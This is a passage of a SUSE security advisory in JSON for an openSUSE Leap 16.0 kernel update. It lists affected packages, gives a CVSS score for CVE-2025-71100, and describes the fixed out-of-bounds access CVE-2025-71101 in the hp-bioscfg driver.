"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
